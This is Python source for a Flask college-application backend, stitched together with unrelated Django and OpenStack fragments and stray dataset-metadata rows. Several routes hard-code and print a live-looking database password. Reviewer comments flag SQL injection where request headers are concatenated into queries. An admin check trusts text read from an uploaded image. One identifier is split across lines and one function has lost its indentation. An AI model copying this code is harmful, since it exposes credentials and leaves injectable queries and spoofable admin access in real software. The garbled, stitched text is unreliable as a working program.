        conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
        print ("Connecting to database\n ->%s" % (conn_string))
        conn = psycopg2.connect(conn_string)
        curs = conn.cursor()
        curs1 = conn.cursor()
        curs2 = conn.cursor()
        studentid = request.headers.get('studentid')
        collegeName = request.headers.get('collegeName')
        print "collegeName: ", collegeName
        collegeN = (collegeName, )
        curs1.execute("SELECT collegeid FROM colleges WHERE collegeName = %s", collegeN)
        result = []
        for row in curs1:
            obj = {
                'collegeid' : row[0]
            }
            result.append(obj)
        # NOTE(review): raises IndexError when the college name is unknown.
        collegeid = result[0]['collegeid']
        collegeN = (collegeid, studentid, )
        print "collegeN: ", collegeN
        curs.execute("SELECT appliedStatus FROM current_application WHERE collegeid = %s and studentid = %s", collegeN)
        result = []
        for row in curs:
            obj = {
                'appliedStatus' : row[0],
            }
            result.append(obj)
        print result
        # Default 2 = no application row found.
        appliedStatus = 2
        if (len(result) > 0):
            appliedStatus = int(result[0]['appliedStatus'])
        print "appliedStatus: ", appliedStatus
        # NOTE(review): if appliedStatus is ever outside {0, 1, 2}, response
        # stays unbound and the status-code line below raises NameError.
        if (int(appliedStatus) == 2):
            response = jsonify("Student Not Found")
        if (int(appliedStatus) == 1):
            response = jsonify("Student Already Applied")
        if (int(appliedStatus) == 0):
            curs2.execute("SELECT questions, major FROM current_application WHERE collegeid = %s and studentid = %s", collegeN)
            result = []
            for row in curs2:
                obj = {
                    'questions' : row[0],
                    'major' : row[1]
                }
                result.append(obj)
            response = jsonify(result)
        response.status_code = 200
        conn.commit()
        curs.close()
        curs1.close()
        curs2.close()
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getCategories", methods=['GET'])
def getCategories():
try:
con, curs = initDB()
query = "SELECT column_name from INFORMATION_SCHEMA.COLUMNS where table_name = 'historicalapplication' AND column_name != 'historicalid'"
curs.execute(query)
result = []
for row in curs:
obj = {
'categories': row[0]
}
result.append(obj)
print result
response = jsonify(result)
print result
response.status_code = 200
con.commit()
curs.close
return response
finally:
if con:
con.close()
@app.route("/getData", methods = ['GET'])
def getData():
    """Return two chosen columns plus 'decision' for a college's history.

    Headers: 'collegeName', column names 'param1'/'param2', and optional
    '||'-delimited filter columns 'vars' with values 'qualitative'.
    Response is [ [param1...], [param2...], [decision...] ].

    SECURITY(review): param1, param2 and each entry of 'vars' are request
    headers concatenated directly into the SQL text — this is injectable.
    Identifiers cannot be bound as parameters; they should be validated
    against a whitelist of known column names before use.
    """
    conn = None
    try:
        conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
        print ("Connecting to database\n ->%s" % (conn_string))
        conn = psycopg2.connect(conn_string)
        curs = conn.cursor()
        collegeName = request.headers.get('collegeName')
        param1 = request.headers.get('param1')
        param2 = request.headers.get('param2')
        variables = request.headers.get('vars')
        quals = request.headers.get('qualitative')
        list_quals = []
        list_vars = []
        if variables != "":
            list_vars = variables.split("||")
            list_quals = quals.split("||")
        collegeN = (collegeN
ame, )
        query = "SELECT " + param1 + ", " + param2 + ", decision FROM historicalapplication WHERE college = %s"
        for i in range(0, len(list_quals)):
            qual_var = list_quals[i]
            # Map the UI's sex labels onto the stored numeric codes.
            if qual_var == "Male":
                qual_var = 1
            elif qual_var == "Female":
                qual_var = 0
            query = query + " and " + list_vars[i] + " = %s"
            collegeN = collegeN + (str(qual_var), )
        curs.execute(query, collegeN)
        result = []
        result1 = []
        result2 = []
        result3 = []
        for row in curs:
            obj = {
                'param1': float(row[0]),
            }
            obj1 = {
                'param2': float(row[1])
            }
            obj2 = {
                'decision': row[2]
            }
            result1.append(obj)
            result2.append(obj1)
            result3.append(obj2)
        result.append(result1)
        result.append(result2)
        result.append(result3)
        response = jsonify(result)
        response.status_code = 200
        conn.commit()
        curs.close()
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getCollegeStatsMajor", methods=['GET'])
def getCollegeStatsMajor():
    """Return per-major averages (act, sat, num_ap, gpa) for a college."""
    conn = None
    try:
        result = []
        conn, cur = initDB()
        collegeName = request.headers.get('collegeName')
        collegeN = (collegeName, )
        cur.execute("SELECT major, AVG(act), AVG(sat), AVG(num_ap), AVG(gpa) FROM historicalapplication where college = %s GROUP BY major", collegeN)
        for row in cur:
            obj = {
                'major' : row[0],
                'act' : float(row[1]),
                'sat' : float(row[2]),
                'num_ap' : float(row[3]),
                'gpa' : float(row[4]),
            }
            result.append(obj)
        conn.commit()
        cur.close()
        response = jsonify(result)
        response.status_code = 200
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getCollegeCountMajor", methods=['GET'])
def getCollegeCounts():
    """Return applicant counts per major for the college in the headers."""
    conn = None
    try:
        result = []
        conn, cur = initDB()
        collegeName = request.headers.get('collegeName')
        collegeN = (collegeName, )
        cur.execute("SELECT major, COUNT(major)FROM historicalapplication where college = %s GROUP BY college, major", collegeN)
        for row in cur:
            obj = {
                'Major' : row[0],
                'Count' : float(row[1])
            }
            result.append(obj)
        conn.commit()
        cur.close()
        response = jsonify(result)
        response.status_code = 200
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getCollegeCountSex", methods=['GET'])
def getCollegeCountSex():
    """Return applicant counts per sex for the college in the headers."""
    conn = None
    try:
        result = []
        conn, cur = initDB()
        collegeName = request.headers.get('collegeName')
        collegeN = (collegeName, )
        cur.execute("SELECT sex, COUNT(sex) FROM historicalapplication where college = %s GROUP BY college, sex", collegeN)
        for row in cur:
            obj = {
                'Sex' : row[0],
                'Count' : float(row[1])
            }
            result.append(obj)
        conn.commit()
        cur.close()
        response = jsonify(result)
        response.status_code = 200
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getCollegeCountRace", methods=['GET'])
def getCollegeCountRace():
    """Return applicant counts per race for the college in the headers."""
    conn = None
    try:
        result = []
        conn, cur = initDB()
        collegeName = request.headers.get('collegeName')
        collegeN = (collegeName, )
        cur.execute("SELECT race, COUNT(race)FROM historicalapplication where college = %s GROUP BY college, race", collegeN)
        for row in cur:
            obj = {
                'Race' : row[0],
                'Count' : float(row[1])
            }
            result.append(obj)
        conn.commit()
        cur.close()
        response = jsonify(result)
        response.status_code = 200
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getCollegeStats", methods = ['GET'])
def getCollegeStats():
    """Return combined stats for a college: averages, race and sex counts.

    Response layout: [avg-object..., [race counts], [sex counts]] — the two
    count lists are appended onto the same top-level list.
    """
    conn = None
    try:
        conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
        print ("Connecting to database\n ->%s" % (conn_string))
        conn = psycopg2.connect(conn_string)
        curs = conn.cursor()
        collegeName = request.headers.get('collegeName')
        collegeN = (collegeName, )
        curs.execute("SELECT college, avg(act), avg(sat), avg(num_ap), avg(gpa) FROM historicalapplication where college = %s GROUP BY college", collegeN)
        result = []
        for row in curs:
            obj = {
                'college': row[0],
                'act': float(row[1]),
                'sat': float(row[2]),
                'num_ap': float(row[3]),
                'gpa': float(row[4])
            }
            result.append(obj)
        result2 = []
        curs2 = conn.cursor()
        curs2.execute("SELECT race, count(race) FROM historicalapplication where college = %s GROUP BY race", collegeN)
        for row in curs2:
            obj = {
                'race' : row[0],
                'count' : float(row[1])
            }
            result2.append(obj)
        result.append(result2)
        result3 = []
        curs3 = conn.cursor()
        # CASE maps the stored sex codes onto display labels.
        curs3.execute("SELECT CASE WHEN sex = '1' then 'Female' WHEN sex = '0' then 'Other' WHEN sex = '2' then 'Male' END AS SEX, count(sex) FROM historicalapplication where college = %s GROUP BY sex", collegeN)
        for row in curs3:
            obj = {
                'sex' : row[0],
                'count' : float(row[1])
            }
            result3.append(obj)
        result.append(result3)
        response = jsonify(result)
        response.status_code = 200
        conn.commit()
        curs.close()
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getCollegeInfo", methods = ['GET'])
def getCollegesInfo():
    """Return the full profile row for the college named in the headers."""
    conn = None
    try:
        conn_string = "host='ec2-54-83-50-145.compute-1.amazonaws.com' dbname='dad8agdskdaqda' port='5432' user='bxzszdjesssvjx' password='30a8521fc6b32229540335c47af5265bb684216e4f58fa81520a91e1d086a5de'"
        print ("Connecting to database\n ->%s" % (conn_string))
        conn = psycopg2.connect(conn_string)
        curs = conn.cursor()
        collegeName = request.headers.get('collegeName')
        collegeN = (collegeName, )
        curs.execute("SELECT information, tuition_in, tuition_out, school_locat, a_calender, num_students, num_ugrads, num_postgrads, found_year, telephone, deadlines, stud_fac, yr_grad, image_link FROM COLLEGES WHERE collegename = %s", collegeN)
        result = []
        for row in curs:
            obj = {
                'information' : row[0],
                'tuition_in' : row[1],
                'tuition_out' : row[2],
                'school_locat' : row[3],
                'a_calender' : row[4],
                'num_students' : row[5],
                'num_ugrads' : row[6],
                'num_postgrads' : row[7],
                'found_year' : row[8],
                'telephone' : row[9],
                'deadlines' : row[10],
                'stud_fac' : row[11],
                'yr_grad' : row[12],
                'image_link' : row[13],
            }
            result.append(obj)
        response = jsonify(result)
        response.status_code = 200
        conn.commit()
        curs.close()
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getColleges", methods = ['GET'])
def getColleges():
    """Return every college's name and image link as a JSON list."""
    conn = None
    try:
        # Use the shared initDB() helper instead of duplicating the
        # hard-coded connection string.
        conn, curs = initDB()
        curs.execute("SELECT collegename, image_link FROM COLLEGES")
        result = [{'collegename': row[0], 'image_link': row[1]} for row in curs]
        response = jsonify(result)
        response.status_code = 200
        conn.commit()
        curs.close()
        return response
    finally:
        if conn:
            conn.close()
@app.route("/getrecommendedColleges", methods = ['GET'])
def getrecommendedColleges():
    """Return recommended colleges for the student in the 'studentid' header.

    Falls back to the complete college list when the model replies
    "Finish Application".
    """
    conn = None
    try:
        # Use the shared initDB() helper instead of duplicating the
        # hard-coded connection string.
        conn, curs = initDB()
        uid = request.headers.get("studentid")
        recommendation = model.main(uid)
        results = []
        if recommendation == "Finish Application":
            curs.execute("SELECT collegename, image_link FROM COLLEGES")
            for row in curs:
                results.append({'collegename': row[0], 'image_link': row[1]})
        else:
            # Debug output hoisted out of the loop; py2/py3-compatible call
            # (the original used a py2 print statement on every iteration).
            print(recommendation)
            for college in recommendation:
                curs.execute("SELECT image_link FROM COLLEGES WHERE collegename = %s", (college, ))
                for row in curs:
                    results.append({'collegename': college, 'image_link': row[0]})
        response = jsonify(results)
        response.status_code = 200
        conn.commit()
        curs.close()
        return response
    finally:
        if conn:
            conn.close()
def insertIntoDB(tablename, keyval, conn, cursor):
    """Insert one row into *tablename* from the key/value pairs in *keyval*.

    NOTE(review): *tablename* and the keys of *keyval* are interpolated
    directly into the SQL text; only the values are parameterized.  Callers
    must not pass untrusted table/column names (SQL injection risk).
    The caller is responsible for committing on *conn*.
    """
    columns = ','.join(keyval)
    placeholder = ','.join("%s" for _ in keyval)
    query = "INSERT INTO " + tablename + " (" + columns + ") VALUES (" + placeholder + ")"
    print (query)
    # Values come from the same dict iteration as the column list above,
    # so their order matches the columns.
    cursor.execute(query, tuple(keyval.values()))
def UpdateIntoDB(tablename, keyval, target_keyval, conn, cursor):
    """Update the *tablename* row whose studentid equals *target_keyval*,
    setting each column named in *keyval* to its value.

    Issues a single UPDATE instead of one statement per column (the
    original also wrote the condition as "WHERE %s = studentid").  As with
    insertIntoDB, table/column names are interpolated into the SQL text and
    must be trusted; values are parameterized.  Caller commits on *conn*.
    """
    if not keyval:
        return
    assignments = ', '.join(k + " = %s" for k in keyval)
    query = "UPDATE " + tablename + " SET " + assignments + " WHERE studentid = %s"
    # Values iterate in the same dict order as the assignment list above.
    cursor.execute(query, tuple(keyval.values()) + (target_keyval, ))
# using SendGrid's Python Library
# https://github.com/sendgrid/sendgrid-python
# import sendgrid
# import os
# from sendgrid.helpers.mail import *
# sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
# from_email = Email("sanatmouli@gmail.com")
# to_email = Email("sanatmouli@gmail.com")
# subject = "Sending with SendGrid is Fun"
# content = Content("text/plain", "and easy to do anywhere, even with Python")
# mail = Mail(from_email, subject, to_email, content)
# response = sg.client.mail.send.post(request_body=mail.get())
# print(response.status_code)
# print(response.body)
# print(response.headers)
@app.route("/sendEmail/<email_id>/<collegename>", methods = ['GET'])
def sendEmail(email_id, collegename):
    """Email the college-application confirmation template to *email_id*."""
    mail = initEmailService()
    msg = Message('Hello', sender = 'collegeappio3@gmail.com', recipients = [email_id])
    msg.html = render_template("email-template-college.html", cname = collegename)
    response = mail.send(msg)
    # Fixed the "REsponse" typo and replaced the py2-only print statement
    # with a py2/py3-compatible call.
    print("Response is: %s" % (response,))
    return jsonify("Sent")
@app.route("/sendEmailtoStudent/<email_id>/<fname>", methods = ['GET'])
def sendEmailtoStudent(email_id, fname):
    """Email the 'application finished' notice to the student *fname*."""
    mail = initEmailService()
    msg = Message('Hello', sender = 'collegeappio3@gmail.com', recipients = [email_id])
    msg.body = "Congratulations "+ fname + "! You have finished your application! Please go ahead and submit your college applications!"
    response = mail.send(msg)
    # py2/py3-compatible print (the original used a py2 print statement).
    print("Response is: %s" % (response,))
    return jsonify("Sent")
#@app.route("/sendEmailAccept/<email_id>/<collegename>/<studentname>", methods = ['GET'])
def sendEmailAccept(email_id, collegename, studentname):
    """Send the acceptance email template for *collegename* to a student.

    Route decorator intentionally disabled: called internally by
    sendEmailStatus().
    """
    mail = initEmailService()
    msg = Message('Hello', sender = 'collegeappio3@gmail.com', recipients = [email_id])
    msg.html = render_template("email-template-accept.html", cname = collegename, sname = studentname)
    response = mail.send(msg)
    # py2/py3-compatible print (the original used a py2 print statement).
    print("Response is: %s" % (response,))
    return jsonify("Sent")
#@app.route("/sendEmailReject/<email_id>/<collegename>/<studentname>", methods = ['GET'])
def sendEmailReject(email_id, collegename, studentname):
    """Send the rejection email template for *collegename* to a student.

    Route decorator intentionally disabled: called internally by
    sendEmailStatus().
    """
    mail = initEmailService()
    msg = Message('Hello', sender = 'collegeappio3@gmail.com', recipients = [email_id])
    msg.html = render_template("email-template-reject.html", cname = collegename, sname = studentname)
    response = mail.send(msg)
    # py2/py3-compatible print (the original used a py2 print statement).
    print("Response is: %s" % (response,))
    return jsonify("Sent")
@app.route("/sendEmailStatus/<email_id>/<collegename>/<studentid>/<accept_status>", methods = ['GET'])
def sendEmailStatus(email_id, collegename, studentid, accept_status):
    """Record an admission decision and notify the student by email.

    *accept_status*: '1' = accepted, '2' = rejected.  Marks the pending
    application row and archives a copy into historicalapplication.
    """
    conn, cur = initDB()
    cur.execute("SELECT fname, lname FROM students where studentid = %s", (studentid, ))
    row = cur.fetchone()
    name = row[0] + " " + row[1]
    if int(accept_status) == 1:
        sendEmailAccept(email_id, collegename, name)
    elif int(accept_status) == 2:
        sendEmailReject(email_id, collegename, name)
    cur.execute("SELECT collegeid from colleges WHERE collegename = %s", (collegename, ))
    row = cur.fetchone()
    collegeid = row[0]
    query = "UPDATE current_application SET acceptancestatus = %s WHERE studentid = %s AND collegeid = %s"
    cur.execute(query, (str(accept_status), studentid, collegeid,))
    # Join the student to THEIR application row.  The original query omitted
    # the join condition on studentid, so with several applicants to the same
    # college the cross product could pair this student with another
    # student's application data.
    query = ("SELECT race, act, sat, gpa, num_ap, sex, current_application.major "
             "FROM students, current_application "
             "WHERE students.studentid = %s AND collegeid = %s "
             "AND current_application.studentid = students.studentid")
    cur.execute(query, (studentid, collegeid))
    race, act, sat, gpa, num_ap, sex, major = cur.fetchone()
    # Numeric sex code used by the historical table: 0 = male, 1 = otherwise.
    sex_act = 0 if sex == "MALE" else 1
    cur.execute("SELECT collegeName FROM colleges WHERE collegeid = %s", (collegeid, ))
    collegeName = cur.fetchone()[0]
    # Allocate the next historical id.  Guard against an empty table: the
    # original indexed row[0] before checking for None, which raised
    # TypeError when no historical rows existed yet.
    cur.execute("SELECT historicalid FROM historicalapplication ORDER BY historicalid DESC LIMIT 1")
    row = cur.fetchone()
    if row is None or row[0] is None:
        next_id = 0
    else:
        next_id = int(row[0]) + 1
    query = "INSERT INTO historicalapplication (historicalid, race, act, sat, gpa, num_ap, sex, major, collegeid, decision, college) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
    cur.execute(query, (next_id, race, act, sat, gpa, num_ap, sex_act, major, collegeid, int(accept_status), collegeName, ))
    conn.commit()
    cur.close()
    response = jsonify("200")
    response.status_code = 200
    return response
@app.route("/putStudents", methods = ['POST'])
def putStudents():
    """Apply the posted JSON key/value pairs to that student's row."""
    conn, cur = initDB()
    payload = ast.literal_eval(json.dumps(request.get_json()))
    UpdateIntoDB('students', payload, payload["studentid"], conn, cur)
    conn.commit()
    cur.close()
    resp = jsonify("HI")
    resp.status_code = 200
    return resp
def xstr(s):
    """Return str(s), mapping None to the empty string."""
    return '' if s is None else str(s)
@app.route("/getStudents/<uid>", methods = ['GET'])
def getStudents(uid):
    """Return every column of the student row for *uid* as a JSON object.

    Values are stringified with xstr() so NULLs serialize as "".
    """
    conn, cur = initDB()
    cur.execute("SELECT * FROM students WHERE studentid = %s", (uid, ))
    # Column names come from the cursor description (the original also
    # round-tripped them through json.dumps/literal_eval for no effect).
    colnames = [desc[0] for desc in cur.description]
    keyval = {}
    for row in cur:
        # studentid is unique, so at most one row; last row wins otherwise,
        # matching the original behavior.
        keyval = dict(zip(colnames, (xstr(v) for v in row)))
    response = jsonify(keyval)
    response.status_code = 200
    cur.close()
    return response
def UpdateIntoAdminDB(tablename, keyval, target_keyval, conn, cursor):
    """Update the *tablename* row whose collegename equals *target_keyval*,
    setting each column named in *keyval* to its value.

    Issues a single UPDATE instead of one statement per column (the
    original also wrote the condition as "WHERE %s = collegename").
    Table/column names are interpolated into the SQL text and must be
    trusted; values are parameterized.  Caller commits on *conn*.
    """
    if not keyval:
        return
    assignments = ', '.join(k + " = %s" for k in keyval)
    query = "UPDATE " + tablename + " SET " + assignments + " WHERE collegename = %s"
    cursor.execute(query, tuple(keyval.values()) + (target_keyval, ))
@app.route("/setCollegeDetails/<collegename>", methods = ['POST'])
def setCollegeDetails(collegename):
    """Update the colleges row for *collegename* with the posted JSON fields."""
    conn, cur = initDB()
    payload = ast.literal_eval(json.dumps(request.get_json()))
    UpdateIntoAdminDB('colleges', payload, str(collegename), conn, cur)
    conn.commit()
    cur.close()
    resp = jsonify("HI")
    resp.status_code = 200
    return resp
@app.route("/setCollegeQuestions/<collegename>", methods = ['POST'])
def setCollegeQuestions(collegename):
    """Update the colleges row for *collegename* with the posted question fields."""
    conn, cur = initDB()
    payload = ast.literal_eval(json.dumps(request.get_json()))
    UpdateIntoAdminDB('colleges', payload, str(collegename), conn, cur)
    conn.commit()
    cur.close()
    resp = jsonify("HI")
    resp.status_code = 200
    return resp
@app.route("/getCollegeName", methods = ['GET'])
def getCollegeName():
    """Return the list of all college names."""
    conn, cur = initDB()
    cur.execute("SELECT collegeName FROM colleges")
    names = [record[0] for record in cur]
    response = jsonify(names)
    response.status_code = 200
    conn.commit()
    cur.close()
    return response
@app.route("/getIDType/<sid>", methods=['GET'])
def getIDType(sid):
    """Classify *sid* as 'admin' (present in the admin table) or 'student'."""
    conn, cur = initDB()
    cur.execute("SELECT admin_id FROM admin WHERE admin_id = %s", (sid, ))
    row = cur.fetchone()
    # Identity check against None instead of '!=' (PEP 8).
    ans = "admin" if row is not None else "student"
    response = jsonify(ans)
    conn.commit()
    cur.close()
    return response
@app.route("/getCollegeNameForUID/<uid>", methods=['GET'])
def getCollegeNameForUID(uid):
    """Return the college row associated with the admin id *uid*."""
    conn, cur = initDB()
    cur.execute("SELECT college FROM admin WHERE admin_id = %s", (uid, ))
    record = cur.fetchone()
    response = jsonify(record)
    response.status_code = 200
    conn.commit()
    cur.close()
    return response
@app.route("/getStudentsForCollegeName/<collegename>", methods=['GET'])
def getStudentsForCollegeName(collegename):
    """Return (questions, studentid, fname) tuples for every current
    application to *collegename*."""
    #get first query to fetch collegeID for that collegename in collegetable
    #get second query in curernt_applications table to fetch q1, q2, q3 and studentID for that collegeID
    #for each row in second query, get the student details
    conn, cur = initDB()
    cur.execute("SELECT collegeid FROM colleges WHERE collegename = %s", (collegename, ))
    row = cur.fetchone()
    # NOTE(review): this wraps the whole fetched row (itself a tuple) in
    # another tuple, so the query parameter below is nested -- presumably
    # the driver adapts it; verify, and consider (row[0], ) instead.
    collegeid = (row, )
    #cur.execute("SELECT q1, q2, q3, studentid FROM current_application WHERE collegeid = %s", collegeid)
    cur.execute("SELECT current_application.questions, current_application.studentid, students.fname FROM current_application LEFT JOIN students on students.studentid = current_application.studentid WHERE current_application.collegeid = %s", collegeid)
    result = []
    for r in cur:
        result.append(r)
    response = jsonify(result)
    response.status_code = 200
    conn.commit()
    cur.close()
    return response
@app.route("/getListOfAcceptedStudents/<collegename>", methods=['GET'])
def getListOfAcceptedStudents(collegename):
    """Return the archived (historical) applications for *collegename*."""
    conn, cur = initDB()
    cur.execute("SELECT collegeid FROM colleges WHERE collegename = %s", (collegename, ))
    row = cur.fetchone()
    # The original wrapped the fetched row twice ((row,) then (collegeid,)),
    # passing a doubly-nested tuple as the query parameter.  Unwrap the
    # scalar id; None (unknown college) simply matches no rows.
    collegeid = row[0] if row is not None else None
    cur.execute("SELECT race, decision, sex, act, sat, num_ap, major, gpa FROM historicalapplication WHERE collegeid = %s", (collegeid, ))
    result = []
    for row in cur:
        result.append({
            'race' : row[0],
            'decision' : row[1],
            'sex' : row[2],
            'act' : row[3],
            'sat' : row[4],
            'num_ap' : row[5],
            'major' : row[6],
            'gpa' : float(row[7]),
        })
    response = jsonify(result)
    response.status_code = 200
    conn.commit()
    cur.close()
    return response
@app.route("/getStatsEachStudent", methods=['GET'])
def getStatsEachStudent():
    """Return per-applicant stats for the college in the 'collegeName' header.

    Response layout (unchanged from the original hand-unrolled version):
    a list of eight parallel lists, in order 'act', 'sat', 'num_ap', 'gpa',
    'race', 'major', 'sex', 'decision', each a list of single-key dicts with
    one entry per historical application.
    """
    conn, cur = initDB()
    collegename = request.headers.get('collegeName')
    cur.execute("SELECT act, sat, num_ap, gpa, race, major, decision, CASE WHEN sex = '1' then 'Female' WHEN sex = '0' then 'Other' WHEN sex = '2' then 'Male' END AS SEX FROM historicalapplication where college = %s", (collegename, ))
    # (output key, row index, converter) in response order.  Note sex is
    # row[7] and decision row[6], matching the SELECT column order.
    fields = [
        ('act', 0, None),
        ('sat', 1, None),
        ('num_ap', 2, None),
        ('gpa', 3, float),
        ('race', 4, None),
        ('major', 5, None),
        ('sex', 7, None),
        ('decision', 6, None),
    ]
    result = [[] for _ in fields]
    for row in cur:
        for bucket, (key, idx, conv) in zip(result, fields):
            value = row[idx]
            bucket.append({key: conv(value) if conv else value})
    response = jsonify(result)
    response.status_code = 200
    conn.commit()
    cur.close()
    return response
@app.route("/getCollegeStatsEachMajor", methods=['GET'])
def getCollegeStatsEachMajor():
    """Return average ACT/SAT/AP-count/GPA per major for one college."""
    collegename = request.headers.get('collegeName')
    result = []
    conn = None
    try:
        conn, cur = initDB()
        cur.execute("SELECT major, AVG(act), AVG(sat), AVG(num_ap), AVG(gpa) FROM historicalapplication where college = %s GROUP BY major", (collegename,))
        for row in cur:
            result.append({
                'major' : row[0],
                'act' : float(row[1]),
                'sat' : float(row[2]),
                'num_ap' : float(row[3]),
                'gpa' : float(row[4]),
            })
    finally:
        # Release the connection even when the query raises; the original
        # only closed it on the success path.
        if conn:
            conn.close()
    return jsonify(result)
def upload_plain_object_to_s3(s3, S3_LOCATION, file, bucket_name, fname, acl="public-read"):
    """Upload *file* bytes to S3 as image/png and return the public URL.

    On failure the exception object itself is returned (kept for backward
    compatibility with existing callers that display it).
    """
    try:
        s3.put_object(
            Body=file,
            Bucket=bucket_name,
            Key=fname,
            ContentType="image/png"
        )
    except Exception as e:
        # py2/py3-compatible print (the original used a py2 print statement).
        print("Something Happened: %s" % (e,))
        return e
    return "{}{}".format(S3_LOCATION, fname)
@app.route("/postImage", methods=['POST'])
#@cross_origin(origin='http://localhost:4200',headers=['Content-Type','Authorization','Access-Control-Allow-Origin','Access-Control-Allow-Methods'])
def postImage():
    """Upload a posted base64 PNG to S3 and run AWS Rekognition text detection.

    Returns JSON {'ADMIN': 'TRUE'|'FALSE', 's3URL': url}: ADMIN is TRUE when
    the detected text contains a university/college keyword plus 'admin'.
    """
    S3_BUCKET = os.environ.get("S3_BUCKET")
    S3_KEY = os.environ.get("aws_access_key_id")
    S3_SECRET = os.environ.get("aws_secret_access_key")
    S3_LOCATION = 'http://{}.s3.amazonaws.com/'.format(S3_BUCKET)
    # Establish a connection to S3.
    s3 = boto3.client(
        "s3",
        aws_access_key_id=S3_KEY,
        aws_secret_access_key=S3_SECRET,
    )
    # Load JSON payload into a dict.
    keyval = json.loads(request.data)
    # Validate the payload BEFORE using it: the original indexed
    # keyval['image'] first, so a missing key raised KeyError instead of
    # returning these friendly messages.
    if 'image' not in keyval:
        return "No image key found in the server side when /postImage was called. Set Header as 'image':'{data}'"
    if 'fname' not in keyval:
        return "No object name found in the server"
    # Angular's FileReader.readAsDataURL() prefixes the payload with
    # "data:image/png;base64,"; strip it before decoding.
    # https://developer.mozilla.org/en-US/docs/Web/API/FileReader/readAsDataURL
    head, data = keyval['image'].split(',')
    decoded = data.decode('base64','strict')
    fname = keyval['fname']
    # Make the upload to the S3 service.
    output = upload_plain_object_to_s3(s3, S3_LOCATION, decoded, S3_BUCKET, fname)
    # Connect to the recognition service.
    rekognition = boto3.client("rekognition", "us-east-2")
    response = rekognition.detect_text(
        Image={
            'S3Object': {
                'Bucket': S3_BUCKET,
                'Name': fname,
            }
        }
    )
    # Normalize detected text for keyword matching (lower-case, dashes
    # removed); 'detected' avoids shadowing the builtin 'map'.
    detected = {}
    for label in response['TextDetections']:
        detected[label['DetectedText'].lower().replace("-", "")] = label['DetectedText']
    # Check for valid keywords.
    if "university" in detected or "college" in detected:
        for k, v in detected.iteritems():
            if "admin" in k:
                return jsonify({'ADMIN' : 'TRUE', 's3URL': output})
    return jsonify({'ADMIN' : 'FALSE', 's3URL': output})
if __name__ == '__main__':
    # Open the initial database connection, then start Flask's development
    # server (debug mode; not suitable for production).
    conn, cur = initDB()
    app.run(debug=True)
| 35,339 | 4 | 1,137 |
e98bfba7bd19220e49c95672db2024072278f987 | 852 | py | Python | users/managers.py | zware/pythondotorg | 00537089b1cfe29de2e71b4e1685baa14aa4475b | [
"Apache-2.0"
] | 1 | 2021-02-12T10:23:37.000Z | 2021-02-12T10:23:37.000Z | users/managers.py | zware/pythondotorg | 00537089b1cfe29de2e71b4e1685baa14aa4475b | [
"Apache-2.0"
] | null | null | null | users/managers.py | zware/pythondotorg | 00537089b1cfe29de2e71b4e1685baa14aa4475b | [
"Apache-2.0"
] | null | null | null | from django.contrib.auth.models import UserManager as BaseUserManager
from django.db.models.query import QuerySet
| 25.818182 | 73 | 0.707746 | from django.contrib.auth.models import UserManager as BaseUserManager
from django.db.models.query import QuerySet
class UserQuerySet(QuerySet):
def public_email(self):
return self.filter(email_privacy__exact=self.model.SEARCH_PUBLIC)
def searchable(self):
return self.filter(
public_profile=True,
search_visibility__exact=self.model.SEARCH_PUBLIC,
)
def public_profile(self):
return self.filter(public_profile=True)
class UserManager(BaseUserManager):
def get_queryset(self):
return UserQuerySet(self.model, using=self._db)
def public_email(self):
return self.get_queryset().email_is_public()
def searchable(self):
return self.get_queryset().searchable()
def public_profile(self):
return self.get_queryset().public_profile()
| 479 | 22 | 235 |
d37a7328f20672a0e0830ad7ddcf87251bffe2f6 | 1,499 | py | Python | openstack/tests/unit/shared_file_system/v2/test_availability_zone.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 99 | 2018-03-28T15:41:45.000Z | 2022-01-23T17:22:13.000Z | openstack/tests/unit/shared_file_system/v2/test_availability_zone.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 5 | 2018-05-25T16:54:23.000Z | 2021-11-21T02:27:16.000Z | openstack/tests/unit/shared_file_system/v2/test_availability_zone.py | horion/openstacksdk | cbb0e12e1dc944847f2ba0e67bf35b9c7a67b3a3 | [
"Apache-2.0"
] | 104 | 2018-04-06T14:33:54.000Z | 2022-03-01T01:58:09.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.shared_file_system.v2 import availability_zone as az
from openstack.tests.unit import base
IDENTIFIER = '08a87d37-5ca2-4308-86c5-cba06d8d796c'
EXAMPLE = {
"id": IDENTIFIER,
"name": "nova",
"created_at": "2021-01-21T20:13:55.000000",
"updated_at": None,
}
| 38.435897 | 75 | 0.735824 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
